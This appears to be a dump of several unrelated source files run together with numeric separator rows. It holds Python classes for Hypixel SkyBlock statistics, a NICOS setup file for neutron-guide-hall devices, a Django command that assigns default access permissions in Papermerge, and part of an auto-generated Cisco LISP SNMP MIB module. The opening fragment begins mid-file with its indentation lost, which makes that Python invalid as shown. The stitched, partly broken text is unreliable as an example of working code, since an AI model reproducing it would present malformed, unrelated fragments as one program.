self.suffocation_deaths = int(stats['deaths_suffocation']) if 'deaths_suffocation' in stats else None
self.protector_dragon_deaths = int(
stats['deaths_protector_dragon']) if 'deaths_protector_dragon' in stats else None
self.sadan_deaths = int(stats['deaths_sadan']) if 'deaths_sadan' in stats else None
self.sadan_golem_deaths = int(stats['deaths_sadan_golem']) if 'deaths_sadan_golem' in stats else None
self.watcher_scarf_deaths = int(stats['deaths_watcher_scarf']) if 'deaths_watcher_scarf' in stats else None
self.scarf_warrior_kills = int(stats['kills_scarf_warrior']) if 'kills_scarf_warrior' in stats else None
self.crypt_undead_deaths = int(stats['deaths_crypt_undead']) if 'deaths_crypt_undead' in stats else None
self.watcher_scarf_kills = int(stats['kills_watcher_scarf']) if 'kills_watcher_scarf' in stats else None
self.spirit_bat_deaths = int(stats['deaths_spirit_bat']) if 'deaths_spirit_bat' in stats else None
self.spirit_miniboss_deaths = int(
stats['deaths_spirit_miniboss']) if 'deaths_spirit_miniboss' in stats else None
self.spirit_chicken_deaths = int(stats['deaths_spirit_chicken']) if 'deaths_spirit_chicken' in stats else None
self.spirit_sheep_deaths = int(stats['deaths_spirit_sheep']) if 'deaths_spirit_sheep' in stats else None
self.crypt_undead_marius_kills = int(
stats['kills_crypt_undead_marius']) if 'kills_crypt_undead_marius' in stats else None
class SkyBlockObjective(object):
    r"""Represents a SkyBlock Objective.

    :param objective_name: The name of the objective.
    :type objective_name: str
    :param objective_data: The objective's data.
    :type objective_data: dict"""

    def __init__(self, objective_name: str, objective_data: dict):
        self.name = objective_name
        self.status = objective_data['status']
        self.progress = objective_data['progress']
        # The API reports completion time in epoch milliseconds; 0 means
        # "never completed", which we expose as None.
        completed_ms = objective_data['completed_at']
        if completed_ms != 0:
            self.completed_at = datetime.datetime.fromtimestamp(completed_ms / 1000)
        else:
            self.completed_at = None
class SkyBlockQuest(object):
    r"""Represents a SkyBlock quest.

    :param quest_name: The name of the quest.
    :type quest_name: str
    :param quest_data: The quest's data.
    :type quest_data: dict"""

    def __init__(self, quest_name: str, quest_data: dict):
        self.name = quest_name
        self.status = quest_data['status']
        # Timestamps arrive in epoch milliseconds; a value of 0 means the
        # event has not happened yet. Guard it like SkyBlockObjective does —
        # previously an unfinished quest reported the 1970 epoch instead of
        # None.
        self.activated_at = datetime.datetime.fromtimestamp(
            quest_data['activated_at'] / 1000
        ) if quest_data['activated_at'] != 0 else None
        self.completed_at = datetime.datetime.fromtimestamp(
            quest_data['completed_at'] / 1000
        ) if quest_data['completed_at'] != 0 else None
class SkyBlockSlayer(object):
    r"""Represents a SkyBlock slayer.

    :param slayer: The name of the slayer.
    :type slayer: str
    :param slayer_data: The slayer's data.
    :type slayer_data: dict"""

    def __init__(self, slayer: str, slayer_data: dict):
        self.slayer = slayer
        self.claimed_levels = slayer_data['claimed_levels']
        earned_xp = slayer_data['xp']
        self.xp = earned_xp
        # The level is derived from XP via the per-slayer conversion in the
        # module-level `types` table.
        self.level = types[slayer](earned_xp)
class SkyBlockPet(object):
    r"""Represents a SkyBlock pet.

    :param pet_data: The pet's data.
    :type pet_data: dict"""

    # (attribute name, API key) pairs; the API uses camelCase for some keys.
    _FIELDS = (
        ('uuid', 'uuid'),
        ('type', 'type'),
        ('xp', 'exp'),
        ('active', 'active'),
        ('tier', 'tier'),
        ('held_item', 'heldItem'),
        ('candy_used', 'candyUsed'),
        ('skin', 'skin'),
    )

    def __init__(self, pet_data: dict):
        for attr, key in self._FIELDS:
            setattr(self, attr, pet_data[key])
class SkyBlockSkill(object):
    r"""Represents a SkyBlock skill.

    :param name: The skill's name.
    :type name: str
    :param skill_data: The skill's data.
    :type skill_data: dict"""

    def __init__(self, name, skill_data):
        level, xp = skill_data['level'], skill_data['xp']
        self.name = name
        self.level = level
        self.xp = xp
| 36,682 | 13,134 |
# NICOS setup: infrastructure devices of the FRM II neutron guide hall west.
# `device()` is provided by the NICOS setup loader when this file is read.
description = 'FRM II Neutron guide hall west infrastructure devices'
group = 'lowlevel'
devices = dict(
    # Manually operated switch mirroring the sixfold shutter state.
    Sixfold = device('nicos.devices.generic.ManualSwitch',
        description = 'Sixfold shutter status',
        states = ('closed', 'open'),
        # pollinterval/maxage are in seconds per NICOS convention —
        # TODO confirm against the NICOS device documentation.
        pollinterval = 60,
        maxage = 120,
    ),
    # Manually entered crane position along the hall, in metres.
    Crane = device('nicos.devices.generic.ManualMove',
        description = 'The position of the crane in the guide '
        'hall West measured from the east end',
        abslimits = (0, 60),
        pollinterval = 5,
        maxage = 30,
        unit = 'm',
        fmtstr = '%.1f',
    ),
)
| 604 | 194 |
from .reaction import ReactionGateway
__all__ = [
"ReactionGateway"
]
import logging
from django.core.management.base import BaseCommand
# django_tenants is an optional dependency; fall back to None when absent.
# Catch only ImportError — a bare `except:` also swallowed SystemExit,
# KeyboardInterrupt and genuine bugs inside django_tenants.
try:
    from django_tenants.utils import get_tenant_model
except ImportError:
    get_tenant_model = None
from django.db import connection
from papermerge.core.models import (
BaseTreeNode,
Access
)
from papermerge.core.auth import (
create_access_perms
)
logger = logging.getLogger(__name__)
class Command(BaseCommand):
    help = """Lists/Updates Access Models associated with nodes.
    """

    def add_arguments(self, parser):
        """Register the --count/--update/--schema-name CLI options."""
        parser.add_argument(
            '--count',
            '-c',
            action="store_true",
            help="Count nodes with/without associated access model."
        )
        parser.add_argument(
            '--update',
            '-u',
            action="store_true",
            help="Updated nodes without associated access model."
        )
        parser.add_argument(
            '--schema-name',
            '-s',
            help="Run checkaccess for this schema."
        )

    def run_count(self):
        """Print the total node count and how many nodes lack an Access row."""
        total_count = BaseTreeNode.objects.count()
        without_access_count = BaseTreeNode.objects.filter(
            access__isnull=True
        ).count()
        print(
            f"total={total_count}, without_access={without_access_count}"
        )

    def run_update(self):
        """Create a default 'allow' Access with full permissions for every
        node that has none."""
        perms = create_access_perms()
        for node in BaseTreeNode.objects.all():
            if node.access_set.count() == 0:
                access = Access.objects.create(
                    user=node.user,
                    access_type='allow',
                    node=node
                )
                access.permissions.add(*perms)

    def handle(self, *args, **options):
        count = options.get('count', False)
        update = options.get('update', False)
        schema_name = options.get('schema_name', False)

        # The django_tenants import is optional at module load; fail here
        # with a clear message instead of the TypeError that calling
        # None() produced.
        if get_tenant_model is None:
            raise RuntimeError(
                "django_tenants is not installed; the checkaccess command "
                "requires a multi-tenant setup."
            )
        TenantModel = get_tenant_model()

        if schema_name:
            tenant_list = TenantModel.objects.filter(name=schema_name)
        else:
            # "public" is the shared schema; node access only lives in
            # tenant schemas.
            tenant_list = TenantModel.objects.exclude(name="public")

        for tenant in tenant_list:
            connection.set_tenant(tenant)
            if count:
                self.run_count()
            elif update:
                self.run_update()
| 2,366 | 651 |
#
# PySNMP MIB module CISCO-LISP-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-LISP-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:04:38 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# --- Symbol resolution -------------------------------------------------------
# pysmi-generated module: `mibBuilder` is injected by the pysnmp loader that
# exec()s this file; every referenced MIB symbol is resolved through it.
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
AddressFamilyNumbers, = mibBuilder.importSymbols("IANA-ADDRESS-FAMILY-NUMBERS-MIB", "AddressFamilyNumbers")
InetPortNumber, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber")
LispAddressType, lispMappingDatabaseTimeStamp, lispFeaturesMapCacheLimit, lispUseProxyEtrState, lispEidRegistrationSiteName, lispUseMapResolverState, lispFeaturesEntry, lispUseMapServerState, lispGlobalStatsEntry, LispAddressType = mibBuilder.importSymbols("LISP-MIB", "lispMappingDatabaseTimeStamp", "lispFeaturesMapCacheLimit", "lispUseProxyEtrState", "lispEidRegistrationSiteName", "lispUseMapResolverState", "lispFeaturesEntry", "lispUseMapServerState", "lispGlobalStatsEntry", "LispAddressType")
NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance")
Counter32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, ObjectIdentity, NotificationType, ModuleIdentity, MibIdentifier, iso, Counter64, Unsigned32, IpAddress, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "ObjectIdentity", "NotificationType", "ModuleIdentity", "MibIdentifier", "iso", "Counter64", "Unsigned32", "IpAddress", "Integer32", "Gauge32")
TextualConvention, TruthValue, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "TimeStamp", "DisplayString")
# --- Module identity ---------------------------------------------------------
# Root OID of CISCO-LISP-EXT-MIB: 1.3.6.1.4.1.9.9.825 (under ciscoMgmt).
ciscoLispExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 825))
ciscoLispExtMIB.setRevisions(('2015-05-13 00:00',))
# Revision descriptions are only settable on newer pysnmp builds.
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: ciscoLispExtMIB.setRevisionsDescriptions(('Initial version of the CISCO-LISP-EXT-MIB module.',))
if mibBuilder.loadTexts: ciscoLispExtMIB.setLastUpdated('201505130000Z')
if mibBuilder.loadTexts: ciscoLispExtMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoLispExtMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: lisp-support@cisco.com')
if mibBuilder.loadTexts: ciscoLispExtMIB.setDescription('This MIB is an extension to the IETF LISP-MIB module defined in RFC 7052. It contains Cisco defined managed objects and traps to support monitoring devices that support the Locator/ID Separation Protocol (LISP).')
# Top-level subtrees: .0 notifications, .1 objects, .2 conformance.
ciscoLispExtNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 0))
ciscoLispExtObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1))
ciscoLispExtConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2))
# --- Table .1.1: RLOCs gleaned from map-server registrations -----------------
clispExtEidRegRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1), )
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setDescription('This table lists the RLOC address gleaned from the map-server registration database for the purpose of RLOC membership. Entry on this table can also be added from configuration.')
# Row indexed by (instance ID, EID AFI, RLOC length, RLOC address).
clispExtEidRegRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRloc"))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setDescription('An entry describes an RLOC address gleaned from the map-server registration database.')
# Index columns (.1-.4) carry no max-access; data columns (.5-.7) are read-only.
clispExtEidRegRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC address.')
clispExtEidRegRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 2), AddressFamilyNumbers())
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC address.')
clispExtEidRegRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC address.')
clispExtEidRegRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 4), LispAddressType())
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setDescription('This object indicates the value of the RLOC address.')
clispExtEidRegRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when this RLOC address was registered. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.')
clispExtEidRegRlocMembershipGleaned = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setDescription('This object indicates whether the RLOC address was gleaned from a received EID prefix registration. If this object is true, then it means the RLOC address was gleaned.')
clispExtEidRegRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setDescription('This object indicates whether the RLOC address was added by configuration. If this object is true, then it means the RLOC address was configured.')
# --- Table .1.2: RLOC membership learned by the xTR --------------------------
# Mirrors table .1.1's column layout, for membership learned from the
# map-server or configured locally.
clispExtRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2), )
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership')
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setDescription('This table lists the RLOC membership learned by the xTR. Entry can be learned from the map-server or from configuration.')
clispExtRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRloc"))
if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setDescription('An entry describes the RLOC membership learned by the xTR.')
clispExtRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)))
if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC membership.')
clispExtRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 2), AddressFamilyNumbers())
if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC membership.')
clispExtRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC membership.')
clispExtRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 4), LispAddressType())
if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setDescription('This object indicates the value of the RLOC membership.')
clispExtRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when the RLOC membership was added. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.')
clispExtRlocMembershipDiscovered = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setDescription('This object indicates whether the RLOC membership was learned from the map-server. If this object is true, then it means the RLOC membership was learned.')
clispExtRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setDescription('This object indicates whether the RLOC membership was added by configuration. If this object is true, then it means the RLOC membership was configured.')
# --- Table .1.3: reliable transport sessions ---------------------------------
# One row per session, indexed by the full (peer addr/port, local addr/port)
# 6-tuple; sessions need not be in established state to appear.
clispExtReliableTransportSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3), )
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setReference('LISP Reliable Transport http://tools.ietf.org/html/draft-kouvelas-lisp-reliable-transport')
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setDescription('This table lists the reliable transport sessions. The session may or may not be in established state.')
clispExtReliableTransportSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerPort"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalPort"))
if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setDescription('An entry describes the reliable transport session.')
clispExtReliableTransportSessionPeerAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setDescription('This object indicates the length of the reliable transport session peer address.')
clispExtReliableTransportSessionPeerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 2), LispAddressType())
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setDescription('This object indicates the peer address of the reliable transport session.')
clispExtReliableTransportSessionPeerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 3), InetPortNumber())
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setDescription('This object indicates the peer port of the reliable transport session.')
clispExtReliableTransportSessionLocalAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setDescription('This object indicates the length of the reliable transport session local address.')
clispExtReliableTransportSessionLocalAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 5), LispAddressType())
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setDescription('This object indicates the local address of the reliable transport session.')
clispExtReliableTransportSessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 6), InetPortNumber())
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setDescription('This object indicates the local port of the reliable transport session.')
# Read-only state/statistics columns (.7-.13).
clispExtReliableTransportSessionState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setDescription('This object indicates the state of the reliable transport session.')
clispExtReliableTransportSessionLastStateChangeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 8), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setDescription('This object indicates the sysUpTime of the last UP/DOWN state transition on the reliable transport session.')
clispExtReliableTransportSessionEstablishmentRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("passive", 1), ("active", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setDescription("This object indicates the role of the reliable transport session. 'active' Connection was initiated locally by the LISP router. 'passive' Connection was accepted by the LISP router listening on the well-known local transport port.")
clispExtReliableTransportSessionMessagesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setDescription('This object indicates the number of messages received on this reliable transport session.')
clispExtReliableTransportSessionMessagesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setDescription('This object indicates the number of messages sent on this reliable transport session.')
clispExtReliableTransportSessionBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setDescription('This object indicates the number of bytes received on this reliable transport session.')
clispExtReliableTransportSessionBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setDescription('This object indicates the number of bytes sent on this reliable transport session.')
# --- Table .1.4: augmentation of LISP-MIB lispGlobalStatsTable ---------------
clispExtGlobalStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4), )
if mibBuilder.loadTexts: clispExtGlobalStatsTable.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsTable.setDescription('This table lists statistic to augment the lispGlobalStatsTable.')
clispExtGlobalStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1), )
# AUGMENTS relationship: rows share the index of lispGlobalStatsEntry.
lispGlobalStatsEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEntry"))
clispExtGlobalStatsEntry.setIndexNames(*lispGlobalStatsEntry.getIndexNames())
if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setDescription('An entry containing additional global statistics information.')
clispExtGlobalStatsEidRegMoreSpecificEntryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setDescription('This object indicates the number of EID prefix registration that are accepted as a result of the accept-more-specific configuration.')
# --- Table .1.5: augmentation of LISP-MIB lispFeaturesTable ------------------
clispExtFeaturesTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5), )
if mibBuilder.loadTexts: clispExtFeaturesTable.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesTable.setDescription('This table contains additional LISP feature entries for lispFeaturesTable.')
clispExtFeaturesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1), )
lispFeaturesEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEntry"))
clispExtFeaturesEntry.setIndexNames(*lispFeaturesEntry.getIndexNames())
if mibBuilder.loadTexts: clispExtFeaturesEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEntry.setDescription('An entry containing additional LISP feature information.')
clispExtFeaturesEidRegMoreSpecificWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server.')
clispExtFeaturesEidRegMoreSpecificLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server.')
clispExtFeaturesMapCacheWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setDescription('This object indicates the map-cache warning threshold on the xTR.')
# --- Scalars .1.6: objects carried only inside notifications -----------------
clispExtNotificationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6))
clispExtEidRegFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noEidPrefixConfiguration", 1), ("authenticationFailure", 2), ("allowedLocatorMismatch", 3)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: clispExtEidRegFailureCause.setStatus('current')
